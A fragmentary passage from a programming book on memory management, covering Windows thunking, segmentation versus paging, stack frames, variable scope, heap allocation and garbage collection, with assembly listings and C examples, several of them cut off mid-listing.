2. Compile the thunk script with the thunk.exe compiler to
produce an .ASM file.
3. Assemble the generated .ASM file twice (to create a 16-bit and
a 32-bit .OBJ file).
4. Create a 16-bit DLL and link it with the 16-bit .OBJ file.
5. Create a 32-bit DLL and link it with the 32-bit .OBJ file.
Memory Management Policies 119
The really interesting piece in this puzzle is the assembly code file
that the thunk compiler generates. It is this assembly code that
allows the 16-bit and 32-bit DLLs to interact.
NOTE For those of you who have never written a DLL, I included the
source code to a 32-bit DLL called dll32.c and a small program that
uses it, called usedll32.c , in the downloadable files (www.word-
ware.com/memory). Reading this code should give you what you need
to know.
Chapter 2
The thunk script is just a text file that spells out the type of signa-
ture of the functions that the 16- and 32-bit DLLs wish to expose to
each other. Consider the following thunk script called
script.thk:
enablemapdirect3216 = true;
The assembly code in script.asm, which the 32-bit DLL will use
to call the 16-bit DLL function (i.e., function16()), looks like
this:
; dword ptr [ebp+8]: cptr
; dword ptr [ebp+12]: n
;
public IIfunction16@8
IIfunction16@8:
push ebp
120 Chapter 2
mov ebp,esp
push ecx
sub esp,60
call SMapLS_IP_EBP_8
push eax
push word ptr [ebp+12] ;n: dword->word
call dword ptr [pfnQT_Thunk_script]
shl eax,16
shrd eax,edx,16
call SUnMapLS_IP_EBP_8
leave
retn 8
You can tell that this assembly code must be called by the 32-bit
DLL because the instructions use the extended registers. For
example, EBP is used as a frame pointer instead of just BP, and ESP
is used to point to the stack instead of just SP.
Keep in mind that the 16-bit DLL is native to 16-bit Windows. A
16-bit DLL does not run in real mode. It runs in a variation of pro-
tected mode. Before we begin, you need to read the following
information carefully.
From this assembly code, we can glean a few things. The two func-
tion arguments, cptr and n, are both 4 bytes in size and have
already been pushed onto the stack. The address of the character
array is located at [ebp+8], and the length argument (i.e., n) is
Memory Management Policies 121
Chapter 2
C:\DevStudio\VC\lib>dumpbin /linkermember thunk32.lib | more
As you can see, Microsoft again has hidden the fine print away in
the THUNK32.DLL library. I should have known better. If you are
interested in taking the next step, you will need to crank up a
disassembler and start reverse engineering THUNK32.DLL.
Should you choose to accept this mission, I would recommend
122 Chapter 2
Closing Thoughts
Looking at the previous three protected mode operating systems
(MMURTL, Linux, and Windows), you should notice a trend. Seg-
mentation-based protection is not utilized to its full potential in any
of the case studies. I suspect that this is because of the way that vir-
tual memory works on Intel machines. The Pentium’s paging
facilities, in addition to supporting memory expansion via disk stor-
age, also provide a degree of segmentation functionality. In fact, not
only does Intel paging support memory segmentation, but it also
does so at a much finer level of granularity. Access policies can be
instituted on a 4KB page level.
If you think about it, segmentation and paging both serve to break
up a region of memory into smaller parts. Paging just partitions
memory into smaller chunks. So, in a sense, investing in an elabo-
rate segmentation scheme via GDTs and LDTs is somewhat of a
wasted effort when the same type of services can be built on an
existing service that is already being used for something else.
The trade-off to relying heavily on paging is that it only permits a
two-ring privilege model. This is a far cry from the four-ring privi-
lege scheme that segmentation hardware supports. Page directory
and page table entries have only a single bit to specify privilege.
This leaves us with a pretty limited user/supervisor implementation
of access privileges. Paging also requires more memory within the
kernel itself because the data structures that track pages of data are
more numerous. Most operating systems give each process its own
page directory, which necessarily implies a handful of page tables
and their entries. A pure segmentation scheme could potentially
only require a single entry in the GDT to delimit and manage an
application in memory.
Memory Management Policies 123
References
Books and Articles
Aleph One. “Smashing the Stack for Fun and Profit.” Phrack, Issue
49.
This is the groundbreaking article that put buffer overflow
attacks on the map.
Chapter 2
Barnaby, Jack. “Win32 Buffer Overflows: Location, Exploitation, and
Prevention.” Phrack, Issue 55.
Bovet, D. and M. Cesati. Understanding the Linux Kernel: From I/O
Ports to Process Management. 2002, O’Reilly & Associates, ISBN:
0596000022.
These authors do an exceptional job of presenting a conceptual
view of how the Linux kernel operates. Generally this book
should be read before you tackle Maxwell’s.
Burgess, Richard. MMURTL V1.0. 2000, Sensory Publishing, Inc.,
ISBN: 1588530000.
There were some people in the computer subculture that sus-
pected that Richard’s book had been suppressed by the powers
that be. Thankfully, they were wrong. MMURTL is back and in
print. Burgess does a particularly nice job of explaining the hard-
ware interface.
Cesare, Silvio. “Runtime Kernel Kmem Patching.” 1998,
http://www.big.net.au/~silvio/runtime-kernel-kmem-
patching.txt.
This is the canonical article on kernel patching. Almost every
article on Linux kernel patching can be traced to this article in
one way or another.
Chebotko, Kalatchin, Kiselev, and Podvoisky. Assembly Language
Master Class. 1994, Wrox Press Inc., ISBN: 1874416346.
This book details a functional DPMI server for DOS.
[email protected]. “Abuse of the Linux Kernel for Fun and
Profit.” Phrack, Issue 50.
This article describes the steps needed to hijack a user-TTY
via LKMs.
Hatch, B., J. Lee, and G. Kurtz. Hacking Linux Exposed. 2001,
McGraw-Hill, ISBN: 0072127732.
Hoglund, Greg. “A *REAL* NT Rootkit: Patching the NT Kernel.”
Phrack, Issue 55.
124 Chapter 2
Chapter 2
tected mode.
Web Sites
http://www.cs.vu.nl/~ast/minix.html
(the home page for MINIX)
http://www.delorie.com/djgpp
DJGPP is the Win32 version of GCC. This distribution offers a
DPMI host called cwsdpmi.exe.
http://www.dunfield.com/downloads.htm
The MICRO-C compiler can be obtained from this site.
http://www.kernel.org
This site offers the most recent Linux kernel source code.
http://www.linux.org
This is one of the more popular Linux portals.
http://www.microsoft.com/
Microsoft provides a number of tool kits that can be down-
loaded for free.
http://www.phrack.com
Before there was hacking, there was phone phraking. This
e-zine came into being when guys like John Draper were explor-
ing the telecom systems. Phrack is one of the oldest and most
respected underground zines in distribution. I found more than a
few interesting articles at this site.
http://www.securityfocus.com
This is an excellent site for getting information on recent soft-
ware exploits. Bugtraq is particularly useful.
http://standards.ieee.org
If you have a couple hundred dollars to spare, you can pur-
chase the POSIX specification at this site.
126 Chapter 2
http://www.tenberry.com/web/dpmi/toc.htm
The DPMI spec is available at this web site, as is the
renowned DOS/4G DOS extender.
http://www.vci.com/products/pharlap.asp
The Phar Lap corporate name is still alive. Believe it or not,
they are still selling a DOS extender.
Chapter 3
High-Level Services
127
128 Chapter 3
Figure 3.1
Compiler-Based Allocation
User applications typically have their address space divided into
four types of regions:
n Code section
n Data section
n Stack
Chapter 3
n Heap
An application may have more than one section of a particular type
(see Figure 3.2). For example, an application may have multiple
code sections and stacks.
Figure 3.2
Figure 3.3
;code region----------------------------------
entry:
PUSH DS
MOV AH,0H
PUSH AX
MOV [oldstack],SP
MOV SP,OFFSET stktop
MOV SP,[oldstack]
RETF
;data region----------------------------------
oldstack DW ?
High-Level Services 131
;stack region---------------------------------
stkbody DB 31 dup ('01')
stktop DB 01H
;code region----------------------------------
printStr:
PUSH BP
MOV BP,SP
MOV AH,09H
MOV DX,[BP+4]
INT 21H
POP BP
RET
Chapter 3
mycode ENDS
END entry
Here is the build command with MASM: C:\MASM\SRC> ML /AT
smallCom.asm
When you run this application, the following message is printed
to the screen:
C:\MASM\SRC>smallCom
the hot side stays hot--the cool side stays cool
As you can see, I have placed data, not to mention a whole entire
stack, dead in the middle of executable code. There are really very
few rules in the case of a .COM binary. Most current executable for-
mats, like the ELF file format or the PE file format, have more
strict and established rules with regard to program section
arrangement.
QUESTION
What does all of this memory partitioning have to do with
development tools?
ANSWER
A compiler is a development tool that acts as a translator. It
consumes human-readable source code, moves the source
through its compound digestive track, and then emits native
machine instructions (or some other type of bytecode). A
132 Chapter 3
Data Section
The data section of an application traditionally supplies what is
known as static memory. As I mentioned earlier, static memory
regions are fixed in size and exist for the duration of an application’s
life span.
Given these two characteristics, most compilers will construct
data sections to serve as storage for global data. For example, con-
sider the following C program:
#include<string.h>
struct employee
{
char firstname[32];
char lastname[32];
unsigned char age;
unsigned int salary;
};
void main()
{
strcpy(drone.firstname,"bill");
strcpy(drone.lastname,"blunden");
drone.age=35;
drone.salary=(int)(3.5);
return;
}
If we look at a listing file, it is clear that the global variables above
have been isolated in their own reserved program section called
_DATA. This section will have a fixed size and exist from the time
the program starts until the time that it exits.
.386P
.model FLAT
PUBLIC _architect
PUBLIC _ceo
High-Level Services 133
_DATA SEGMENT
COMM _drone:BYTE:048H
_architect DB 'Gil', 00H
ORG $+28
DB 'Bates', 00H
ORG $+26
DB 02dH
ORG $+3
DD 0186a0H
_ceo DB 'Reed', 00H
ORG $+27
DB 'Almer', 00H
ORG $+26
DB 02aH
ORG $+3
DD 017318H
_DATA ENDS
PUBLIC _main
EXTRN _strcpy:NEAR
Chapter 3
_DATA SEGMENT
$SG117 DB 'bill', 00H
ORG $+3
$SG118 DB 'blunden', 00H
_DATA ENDS
_TEXT SEGMENT
_main PROC NEAR
; 16 : {
push ebp
mov ebp, esp
; 17 : strcpy(drone.firstname,"bill");
; 18 : strcpy(drone.lastname,"blunden");
; 19 : drone.age=35;
; 21 : return;
; 22 : }
pop ebp
ret 0
_main ENDP
_TEXT ENDS
END
The data section has a long and venerable history as the second old-
est type of application memory section. In the old days, programs
were just code and a fixed clump of static storage. The sysop was
the only person with a console, punch cards were considered
high-tech, and a top-of-the-line Dietzgen-Tyler Multilog slide rule
with enamel finish cost $35.
Code Section
At the end of the day, an application’s various sections are just bytes
in memory. So in some special cases, you can get away with using a
code section for data storage. In other words, it is possible to turn a
code section into a data section. The magic rule to keep in mind is:
It is data as long as you don’t execute it. Here is an example:
/* --codedata.c-- */
#include<stdio.h>
void code()
{
/*
on Intel, each instruction is 4 bytes:
encoded as 0x66 0xb8 0x07 0x00
*/
_asm MOV AX,0x07
_asm MOV AX,0x07
_asm MOV AX,0x07
_asm MOV AX,0x07
High-Level Services 135
/* 16 bytes total */
return;
}
void main()
{
char *cptr;
short reg;
code();
_asm MOV reg,AX
printf("reg=%d\n",reg);
cptr = (char*)code;
cptr[0]='d'; cptr[1]='a';cptr[2]='t';cptr[3]='a';
cptr[4]=(char)0;
printf("cptr[]=%s\n",cptr);
return;
}
Chapter 3
This can be built as a 16-bit DOS app with Turbo C++.
C:\TCC\codeData>TCC -ms codedata.c
Figure 3.4
136 Chapter 3
Stack
A stack is a sequence of bytes in memory that act like a
first-in-last-out (FILO) data structure. Computer stacks typically
“grow down.” Each stack has a stack pointer (i.e., SP in Figure 3.5)
that stores the lowest address of the last item allocated on the
stack. When a new item is added to the stack, the stack pointer is
decremented to point to that item’s first byte.
Figure 3.5
Figure 3.6
Chapter 3
values from the stack pointer does effectively change where SP
points, and this is a very fast way to allocate and free large amounts
of storage on the stack. However, transferring data to and from the
stack must be done manually. This is illustrated in Figure 3.7.
Figure 3.7
memory will start, regardless of how big or small the data item to be
allocated is.
The stack, though it might seem simple, is an extremely power-
ful concept when applied correctly. Stacks are used to implement
high-level features like recursion and variable scope. Some garbage
collectors use them as an alternative to a heap for more efficient
allocation.
Activation Records
If you wanted to, you could use registers to pass parameter informa-
tion to a function. However, using registers to pass parameters does
not support recursion. Using the stack is a more flexible and power-
ful technique. Managing the stack to facilitate a function call is the
responsibility of both the procedure that is invoking the function
and the function being invoked. Both entities must work together in
order to pass information back and forth on the stack. I will start
with the responsibilities that belong to the invoking function.
The following steps can be used to invoke a procedure and pass it
arguments:
1. Push the current function’s state onto the stack.
2. Push the return value onto the stack.
3. Push function arguments onto the stack.
4. Push the return address onto the stack.
5. Jump to the location of the procedure.
Using Intel’s CALL instruction will typically take care of the last two
steps automatically. The function being invoked must also take a few
steps to ensure that it can access the parameters passed to it and
create local storage:
1. Push EBP on to the stack (to save its value).
2. Copy the current ESP value into EBP.
3. Decrement ESP to allocate local storage.
4. Execute the function’s instructions.
The code that performs these four steps is known as the invoked
function’s prologue.
The result of all this stack manipulation is that we end up with a
stack arrangement similar to that displayed in Figure 3.8.
The region of the stack used to store a function’s parameters and
local storage is referred to as the activation record because every
time a procedure is activated (i.e., invoked), this information must
be specified. An activation record is also known as a stack frame.
High-Level Services 139
Figure 3.8
Chapter 3
NOTE On Intel machines, the EBP register is pushed on the stack so
that it can serve as a reference point. EBP is known as the stack frame
pointer, and it is used so that elements in the activation record can be
referenced via indirect addressing (i.e., MOV AX,[EBP+5]).
When the function has done its thing and is ready to return, it must
perform the following stack maintenance steps:
1. Reclaim local storage.
2. Pop EBP off the stack.
3. Pop the return address off the stack.
4. Jump to the return address.
The Intel RET instruction will usually take care of the last two
steps.
The code that performs the previous four steps is known as the
invoked function’s epilogue.
Once the invoked function has returned, the invoking function
will need to take the following steps to get its hands on the return
value and clean up the stack:
1. Pop the function arguments off the stack.
2. Pop the return value off the stack.
3. Pop the saved program state off the stack.
140 Chapter 3
void main()
{
int retval;
retval = sigma(array,5);
return;
}
If we look at a listing file, we can see how activation records are uti-
lized in practice:
.386P
.model FLAT
PUBLIC _array
_DATA SEGMENT
_array DB 01H
DB 02H
DB 03H
DB 04H
DB 05H
_DATA ENDS
PUBLIC _sigma
High-Level Services 141
_TEXT SEGMENT
_cptr$ = 8
_n$ = 12
_i$ = -8
_sum$ = -4
_sigma PROC NEAR
; 7 : {
push ebp
mov ebp, esp
sub esp, 8
; 8 : int i;
; 9 : int sum;
; 10 :
; 11 : sum= 0;
Chapter 3
; 12 : for(i=0;i<n;i++){ sum = sum+ cptr[i]; }
; 13 : return(sum);
; 14 : }
_TEXT ENDS
PUBLIC _main
_TEXT SEGMENT
_retval$ = -4
_main PROC NEAR
; 17 : {
push ebp
mov ebp, esp
push ecx
; 18 : int retval;
; 19 :
; 20 : retval = sigma(array,5);
push 5
push OFFSET FLAT:_array
call _sigma
add esp, 8
and eax, 65535 ; 0000ffffH
mov DWORD PTR _retval$[ebp], eax
; 21 :
; 22 : //printf("retval=%d\n",retval);
; 23 : return;
; 24 : }
push 5
push OFFSET FLAT:_array
call _sigma
The invoking function pushes on the arguments. The CALL instruc-
tion automatically pushes a return address onto the stack. What
about the return value?As it turns out, the compiler is smart
enough to realize that recursion does not exist and uses the EAX
register to pass a return value back to main().
High-Level Services 143
Chapter 3
Figure 3.9
Once sigma() has calculated its sum, it places the return value in
EAX and cleans out the local storage. The RET instruction automati-
cally pops the return address off the stack.
; 13 : return(sum);
; 14 : }
Scope
The scope of a program element (a variable declaration, a function,
etc.) determines both the visibility and, potentially, the life span of
the element. When a program element is visible, it can be accessed
and manipulated. The life span of a program element determines
when the element is created and destroyed.
The one caveat to this rule is for program elements that have
their storage space allocated off the heap, dynamically, during exe-
cution. In this case, scope only defines the visibility of the program
element. The element will exist until it is reclaimed, which may or
may not be related to the scope of the element.
To explore the meaning of scope, let us examine how scope rules
apply to variables in the C programming language. Scope rules in C
are implemented through the use of code blocks. A block of code is a
region of source code that lies between a pair of brackets (i.e.,
between a “{” and a “}”). A function definition is an example of a
block of code.
void myfunction()
{
# block of code
return;
}
In fact, functions are actually at the top of the block hierarchy in C.
Functions may contain other blocks of code, as long as the blocks of
code are not function definitions (which is to say that function defi-
nitions cannot be nested in C). For example, the following function
definition contains a few sub-blocks:
void myfunction()
{
int i;
for(i=0;i<10;i++)
{
High-Level Services 145
if((i%2)==0)
{
printf("%d is even\n",i);
}
}
{
int j=10;
printf("j=%d\n",j);
}
return;
}
From the previous function definition, we can see that blocks of
code may be nested. In addition, although blocks of code are usually
associated with program control statements, it is possible for blocks
of code to exist independently of a program control statement. For
example, the code that prints out the value of “j” is a stand-alone
block.
Chapter 3
Even though functions may contain other blocks of code, blocks
of code (that are not function definitions) cannot independently exist
outside of a function definition. For example, you would never see:
void myfunction1()
{
# block of code
return;
}
int i;
for(i=0;i<10;i++){ printf("%d\n",i); }
void myfunction2()
{
# block of code
return;
}
An ANSI C compiler processing the previous code would protest
that the for loop does not belong to a function and would refuse to
compile the code.
The scope of variables in C is block based. A variable declared
inside of a block of code is known as a local variable. A local variable
is visible in the block in which it is declared and all the sub-blocks
within that block. A variable cannot be accessed outside of the block
in which it was declared. For example, the following snippet of C
code is completely legal:
void main()
{
146 Chapter 3
int i;
for(i=0;i<10;i++)
{
int j=i*i;
printf("i=%d, i^2=%d\n",i,j);
}
return;
}
The following snippet of C code, however, is illegal:
void main()
{
int i;
for(i=0;i<10;i++)
{
int j=i*i;
printf("i=%d, i^2=%d\n",i,j);
}
printf("i=%d, i^2=%d\n",i,j);
return;
}
In the first case, we are perfectly within the syntactical rules of C
when the variable “i” is accessed in a sub-block. In the second
case, however, if we try to access the variable “j” outside of its
declaring block, the compiler will emit an error. Naturally, there are
two special cases to this rule: global variables and the formal param-
eters of a function.
A global variable is a variable defined outside of any block of code.
As such, a global variable is visible throughout a program by every
section of code. Global variables also exist for the duration of a pro-
gram’s execution path.
Formal parameters are the variables specified in the prototype of
a function. They are the variables that receive the arguments
passed to a function when it is invoked. Formal parameters have
visibility and a life span that is limited to the body of the function
they belong to.
Two basic techniques exist with regard to managing scope within
the body of a procedure: the all-at-once approach and additional
stack frames.
One way to manage scope is to allocate storage for all of a func-
tion’s local variables in the prologue code. In other words, we use
the function’s activation record to provide storage for every local
variable defined inside of the function, regardless of where it is
used. To support this approach, a compiler will use its symbol table
to make sure that a local variable is not accessed outside of its
declaring block.
High-Level Services 147
arr1[0]='a';
i=argc;
if(i<4)
{
unsigned char arr2[7];
unsigned long int j;
unsigned long int k;
arr2[0]='b';
j=5;
Chapter 3
k=6;
}
else
{
unsigned char arr3[17];
arr3[0]='c';
}
}
By looking at its assembly code equivalent, we can see how storage
for all these variables was allocated:
.386P
.model FLAT
PUBLIC _main
_TEXT SEGMENT
_argc$ = 8
_arr1$ = -24
_i$ = -4
_arr2$31 = -40
_j$32 = -28
_k$33 = -32
_arr3$35 = -60
_main PROC NEAR
; Line 4
push ebp
mov ebp, esp
sub esp, 60 ; 0000003cH
; Line 8
mov BYTE PTR _arr1$[ebp], 97 ; 00000061H
; Line 9
mov eax, DWORD PTR _argc$[ebp]
148 Chapter 3
Figure 3.10
High-Level Services 149
NOTE In a way, stacks are really about storage life span. Visibility
restrictions follow naturally as a result of life span constraints. Recall
that stacks are good for situations in which you need to do, and then
undo, an operation. This makes them perfect for creating temporary
storage. The limited visibility is more of a side effect of the limited life
span. Once a variable has been popped off the stack, it is gone and
any reference to it can yield garbage.
Chapter 3
only has local variables. Table 3.1 presents a basic comparison of
functions and code blocks.
Table 3.1
Saved Return Arguments Return Variables
State Value Address
Function yes yes yes yes yes
Sub-block yes no yes no yes
As you can see from the table, a code block has saved program state
information and local variables in its stack frame. Local variables
declared outside the block but accessed inside the block can be
treated as arguments. Figure 3.11 displays a comparison of the stack
frames used by a function and a code block.
Figure 3.11
150 Chapter 3
QUESTION
What are the trade-offs between the all-at-once approach and
the additional stack frame approach?
ANSWER
The extra stack frame technique requires that stack manipula-
tion be performed every time a block is entered or exited. If a
section of code has a heavily nested set of blocks, this translates
into a lot of extra push and pop operations. This means the extra
stack frame tactic will create an executable that is larger and
slower because more instructions will need to be executed.
Another downside of using the all-at-once tactic is that it re-
quires a lot of storage overhead. Space in the activation record
will be reserved even if a variable is not used. If a function has
several different possible execution paths, a lot of storage is
wasted.
Table 3.2 summarizes a comparison of these two techniques.
Table 3.2
All-at-once Allocation Extra Stack Frames
Speed faster slower
Stack memory more less
usage
Executable size smaller larger
Static or Dynamic?
The stack is a hybrid between a purely static and a purely dynamic
form of storage. It is not purely static because the amount of occu-
pied storage on a stack varies with each function call. Each time a
function is invoked, a new activation record is pushed on to the
stack. When a function returns, its activation record vanishes and all
of its associated data goes out of scope.
However, the way in which stack storage is allocated and freed
obeys a strict first-in-last-out (FILO) policy. In addition, the regions
of storage consumed on a stack are almost completely dictated by
the compiler. In a structured language like C, the stack is populated
with nothing but activation records, and the size of each activation
record is fixed at compile time. Thus, there is a lot more regularity
with a stack than there is with a dynamic storage mechanism like a
heap. The stack, as I have said before, is a predictable creature. In
High-Level Services 151
Heap Allocation
Heap memory allocation, also known as dynamic memory allocation
(DMA), consists of requesting memory while an application is run-
ning from a repository known as the heap. A heap is just a collection
of available bytes (i.e., a bunch of bytes piled into a heap). Unlike
the data segment or the stack, the size and life span of memory allo-
Chapter 3
cated from the heap is completely unpredictable. This requires the
agent that manages the heap to be flexible, and this, in turn, trans-
lates into a lot of extra memory management code.
The data segment requires no special management code, and
stack management is limited primarily to the prologue and epilogue
code of functions. The heap, however, normally has its own dedi-
cated set of elaborate routines to service memory requests.
Table 3.3
Storage Size Life Span Bookkeeping
data section fixed program life span none
stack fixed size stack frames function-based all at compile time
heap varies varies significant at run time
The heap relies heavily on user mode libraries. These libraries (like
malloc() and free() declared in stdlib.h) may be invoked
directly by programs or called indirectly by a virtual machine. Either
way, these libraries normally end up utilizing facilities provided by
the underlying operating system. Thus, before we dive straight into
managing memory through user libraries, it would help to under-
stand how they communicate with the operating system.
NOTE In case you are wondering, NACHOS stands for Not Another
Completely Heuristic Operating System. I think Richard Burgess is cor-
rect; we are running out of good acronyms.
High-Level Services 153
System calls are not always spelled out with tidy C prototypes.
Some operating systems, like DOS, have a system call interface that
is specified strictly in terms of interrupts. Consider the following
DOS system call:
Interrupt: 0x21 (i.e., INT 0x21)
Function: 0x09
Description: prints a string terminated by a $
Inputs: AH = 9
DS = segment address of string
DX = offset address of string
A wise system engineer will attempt to ward off complexity by ban-
ishing the system-related assembly code to the basement of the OS.
There, in the darkness, only a trained plumber with a flashlight can
muck around with the pipes. Even then, an experienced developer
will attempt to wrap the assembly code in C/C++ to make it more
palatable. Tanenbaum, for instance, did an excellent job of wrapping
Chapter 3
assembly routines when he implemented MINIX.
System calls are the atomic building blocks that all other APIs rely
on. The user libraries that help to manage memory are built upon
the relevant system calls. The layering effect that is generated by
building one set of functions on top of another is illustrated in Fig-
ure 3.12.
154 Chapter 3
Figure 3.12
User libraries cannot directly access system calls. They must all
travel through a choke point called the system call gate. If an operat-
ing system were a fortress, the system call gate would be its
drawbridge. Everything outside the gate runs in user mode, and
everything inside the fortress runs in kernel mode.
The system call gate is the only way in and out of the kernel.
This is because memory management at the operating system level,
in conjunction with the processor, prevents user code from making a
FAR JMP directly to kernel functions. For the most part, this keeps
the Viking pillagers at a safe distance from the inhabitants of the
kernel. Occasionally, however, there are curious explorers like Sven
Schreiber who find a hole in the castle wall. Sven found a way
around the Windows 2000 system call gate. He describes this dis-
covery in his book, Undocumented Windows 2000 Secrets.
Chapter 3
The putc() function, in turn, wraps a system call called write().
A recurring theme that you will notice is the tendency of functions
with specific duties to invoke more general and primitive routines.
/*
stream = output stream to write to
buffer = buffer of bytes to write to stream
nbytes = number of bytes to write
returns: number of bytes written to stream
*/
asm
{
MOV ECX,USER_LIBRARY
LEA EAX,call_struct
INT SYSTEM_GATE
}
}
Notice how the write() function is actually a front man for a more
general system call gate called SYSTEM_GATE.
156 Chapter 3
The Heap
The heap is just a region of bytes. It is a portion of an application’s
address space that has been set aside for run-time memory
requests. As mentioned previously, the general nature of possible
memory requests forces the code that manages the heap to have to
deal with a number of possible contingencies. The heap manager
cannot handle every type of request equally well, and concessions
have to be made. As a result of this, heap management is beset by
three potential pitfalls:
n Internal fragmentation
n External fragmentation
n Location-based latency
Internal fragmentation occurs when memory is wasted because a
request for memory resulted in the allocation of a block of memory
that was much too big, relative to the request size. For example,
let’s say you request 128 bytes of storage and the run-time system
gives you a block of 512 bytes. Most of the memory you’ve been
allocated will never be used. Management schemes that allocate
fixed-sized memory blocks can run into this problem.
External fragmentation occurs when a series of memory requests
leaves several free blocks of available memory, none of which are
large enough to service a typical request.
Latency problems can occur if two data values are stored far
apart from one another in memory. The farther apart two values are
in memory, the longer it takes for the processor to perform opera-
tions that involve those values. In an extreme case, one value may
be so far away that it gets paged-out to disk and requires a disk I/O
operation to bring it back into the ball game.
Latency problems can also occur because of complexity. If an
algorithm takes extensive measures to ensure that internal and
external fragmentation are both minimized, the improvement in
memory utilization will be offset by the additional execution time
necessary to perform the requisite accounting.
Depending on the allocation technique used by the heap manage-
ment code, it will suffer from one or more of these problems. Rarely
can you have your cake and eat it too.
Figure 3.13 displays these three pitfalls.
In the end, what makes the heap an interesting problem is not
the heap itself, but the algorithms used to manage it. There are two
different approaches to managing heap memory: manual memory
management and automatic memory management.
High-Level Services 157
Figure 3.13
Chapter 3
In the next two sections, I will examine both of these techniques
and offer examples of how they are used in practice.
int oldsize;
if (ptr == NULL){ return malloc(size); }
oldsize = sizeMem(ptr);
if (size <= oldsize){ return ptr; }
cptr = (char *)malloc(size);
memcpy(cptr, ptr, oldsize);
free(ptr);
return cptr;
}
The implementation of malloc() and free() varies greatly from
one distribution to the next, so it is a little harder for me to offer ref-
erence implementations. The malloc() and free() functions on
UNIX platforms are front men for the brk() system call. Its proto-
type usually resembles something like this:
int brk(void *end_heap);
Chapter 3
program’s heap by either increasing or decreasing its end point. The
end_heap value can be changed as long as it does not infringe on
other sections of the application.
NOTE The POSIX standard does not include brk() on the grounds
that it dictates a certain underlying memory model implementation.
On most flavors of UNIX, however, you will find the brk() system call.
If you are interested in looking at an implementation of brk(), I
would recommend taking a look at the one that accompanies Linux. It
is located in the /usr/src/linux/mm/mmap.c file.
Now that you are familiar with C’s manual memory allocation func-
tions, I can demonstrate how dangling pointers occur and what
happens when they do. Consider the following example:
/* --dangleptr.c-- */
#include<stdio.h>
#include<stdlib.h>
void main()
{
char *cptr1;
char *cptr2;
cptr1 = malloc(10);
printf("address=%p\n",cptr1);
free(cptr1); /* whoops! */
160 Chapter 3
cptr2 = malloc(10);
printf("address=%p\n",cptr2);
NOTE Scientists like George Miller have claimed that the average
human can only keep track of about seven things at any point in time.
By forcing the developer to keep track of memory recycling, the num-
ber of things the developer has to juggle increases. Garbage collection
is an effective solution to this problem.
Don’t take my word for it. Here is what Bertrand Meyer, the inventor
of Eiffel, has to say:
“Manual memory management — that is to say, the absence of
automatic garbage collection — suffers from two fatal flaws: it is dan-
gerous (as it is all too easy to make a mistake, causing errors that are
often missed during testing and arise only when the system goes oper-
ational, usually in erratic and hard-to-reproduce conditions); and it is
extremely tedious, forcing the developer to concentrate on mundane
yet complex tasks of bookkeeping and garbage collection instead of
working on their application. These deficiencies are bad enough to
cancel out any benefit that is claimed for the application of object-ori-
ented techniques.”
Chapter 3
that attempted to follow this route, like Symbolics, which sold LISP
machines. LISP machines were manufactured in the 1970s and
1980s. The idea, unfortunately, never really caught on. In the
mid-1990s, Symbolics went bankrupt.
There are a number of programming environments that support
automatic memory management. This includes popular virtual
machines like Java’s and more obscure run times, like the one that
Smalltalk utilizes. There are even garbage collectors than can be
plugged into native code via user mode libraries. This brings us to
the Boehm-Demers-Weiser conservative garbage collector.
NOTE You will need to make sure that the necessary environmental
variables have been set up. You can do so by executing the
VCVARS32.BAT batch file before you invoke NMAKE.
#include<stdio.h>
#define GC_NOT_DLL
#include<gc.h>
void printMemSize()
{
unsigned long nfree;
nfree = GC_get_free_bytes();
printf("total heap=%7lu\t",GC_get_heap_size());
printf("free bytes=%7lu\t",nfree);
if(oldmem!=0)
{
printf("change=%ld",(oldmem-nfree));
}
printf("\n");
oldmem = nfree;
return;
}/*end printHeapSize*/
void main()
{
short j;
unsigned long i;
for(j=0;j<15;j++)
{
High-Level Services 163
}/*end main*/
In the previous code example, I reuse the bdwptr pointer repeat-
edly in an effort to create a memory leak. If you compile and run
this program on Windows, you will get output like the following:
total heap= 65536 free bytes= 45056
total heap= 65536 free bytes= 24576 change=20480
total heap= 65536 free bytes= 4096 change=20480
Chapter 3
total heap= 65536 free bytes= 24576 change=-20480
total heap= 65536 free bytes= 4096 change=20480
total heap= 131072 free bytes= 49152 change=-45056
total heap= 131072 free bytes= 28672 change=20480
total heap= 131072 free bytes= 8192 change=20480
total heap= 131072 free bytes= 90112 change=-81920
total heap= 131072 free bytes= 69632 change=20480
total heap= 131072 free bytes= 49152 change=20480
total heap= 131072 free bytes= 28672 change=20480
total heap= 131072 free bytes= 8192 change=20480
total heap= 131072 free bytes= 90112 change=-81920
total heap= 131072 free bytes= 69632 change=20480
forcing collection
total heap= 131072 free bytes= 110592
change=-40960
Press any key to continue
As you can see, the amount of free memory does not just descend
downward, as it normally would if you were using malloc().
Instead, it increases a couple of times, which indicates that garbage
collection has occurred. At the end of the sample code, I explicitly
force collection to illustrate this.
NOTE You will need to make sure that the linker includes gc.lib
in its list of libraries. Also, I could only get this to work with the release
version of Visual Studio’s libraries. Trying to link gc.lib to Microsoft’s
debug libraries gave my linker a fit.
164 Chapter 3
Table 3.4
Manual Memory Automatic Memory
Management Management
Benefits size (smaller) constrains complexity
speed (faster)
control (you decide when to
free)
Costs complexity larger total memory footprint
memory leaks “comparable” performance
dangling pointers
Chapter 3
Let us look at an example. This way, I cannot be accused of sup-
porting my conclusions with arm waving. Consider the following
program that uses traditional memory management facilities:
#include<stdio.h>
#include<stdlib.h>
void main()
{
short j;
unsigned long i;
for(j=0;j<15;j++)
{
unsigned char *bdwptr;
bdwptr = malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
return;
}/*end main*/
Now look at one that uses the BDW collector:
#include<stdio.h>
#define GC_NOT_DLL
#include<gc.h>
void main()
{
short j;
unsigned long i;
for(j=0;j<15;j++)
{
unsigned char *bdwptr;
bdwptr = GC_malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
return;
}/*end main*/
When I built both of these programs on Windows, the executable
that used manual memory management calls was 27,648 bytes in
size. The executable that used the BDW collector was 76,800 bytes
in size. This is over twice the size of the other program. QED.
With manual memory management, the programmer is responsi-
ble for keeping track of allocated memory. None of the bookkeeping
manifests itself in the source code as extra instructions. When the
programmer wants to release memory, they call free(). There is
no need to execute a lengthy series of functions to sweep through
memory looking for “live” pointers.
In the process of hunting down memory to free, the garbage col-
lector will also find many allocated regions of memory that are still
needed, and it will not free these blocks of memory. However, this
means that the collector will repeatedly perform unnecessary pro-
cedures every time it attempts collection. This suggests to me that
these superfluous actions will cause automatic memory collection to
be necessarily slower than manual memory management.
Again, I would like to rely on empirical data instead of just
appealing to your sense of intuition. Consider the following source
code:
#include<stdio.h>
#include<windows.h>
#include<stdlib.h>
#define KB 1024
void main()
{
short j;
unsigned long i;
